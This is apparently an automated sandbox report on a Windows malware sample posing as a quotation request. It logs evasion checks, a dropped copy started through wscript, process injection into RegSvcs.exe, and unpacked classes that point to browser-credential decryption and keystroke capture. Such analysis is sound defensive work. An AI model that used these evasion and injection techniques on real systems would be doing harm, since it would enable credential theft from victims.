Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1975	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7840	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7800	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2057	Jump to behavior

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-106533

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	API coverage: 4.6 %

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0103445A
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0103C75C
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103C6D1 FindFirstFileW,FindClose,	0_2_0103C6D1
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0103EF95
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0103F0F2
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0103F3F3
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_010337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_010337EF
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01033B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_01033B12
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0103BCBC
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_002E445A
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EC6D1 FindFirstFileW,FindClose,	2_2_002EC6D1
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_002EC75C
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_002EEF95
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_002EF0F2
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_002EF3F3
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_002E37EF
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_002E3B12
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_002EBCBC

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FD49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599025	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598920	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593868	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599774	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599440	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: RegSvcs.exe, 00000006.00000002.3335527647.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000003.00000002.3337186737.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	API call chain: ExitProcess graph end node			graph_0-104291
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	API call chain: ExitProcess graph end node			graph_0-104357

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01043F09 BlockInput,

0_2_01043F09

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00FD3B3A

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01005A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_01005A7C

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD4B37 LoadLibraryA,GetProcAddress,

0_2_00FD4B37

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_015FA228 mov eax, dword ptr fs:[00000030h]	0_2_015FA228
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_015FB868 mov eax, dword ptr fs:[00000030h]	0_2_015FB868
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_015FB8C8 mov eax, dword ptr fs:[00000030h]	0_2_015FB8C8
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_01295688 mov eax, dword ptr fs:[00000030h]	2_2_01295688
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_01296D28 mov eax, dword ptr fs:[00000030h]	2_2_01296D28
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_01296CC8 mov eax, dword ptr fs:[00000030h]	2_2_01296CC8

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0102810A GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_0102810A

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FFA155
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FFA124 SetUnhandledExceptionFilter,	0_2_00FFA124
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002AA124 SetUnhandledExceptionFilter,	2_2_002AA124
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002AA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_002AA155

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9B3008			Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB0008			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_010287B1 LogonUserW,

0_2_010287B1

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00FD3B3A

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00FD48D7

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01034C27 mouse_event,

0_2_01034C27

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Allene\nonplacental.exe "C:\Users\user\AppData\Local\Allene\nonplacental.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\nonplacental.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01027CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_01027CAF

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0102874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0102874B

Source: QUOTATION REQUEST - BQS058.exe, nonplacental.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: QUOTATION REQUEST - BQS058.exe, nonplacental.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FF862B cpuid

0_2_00FF862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
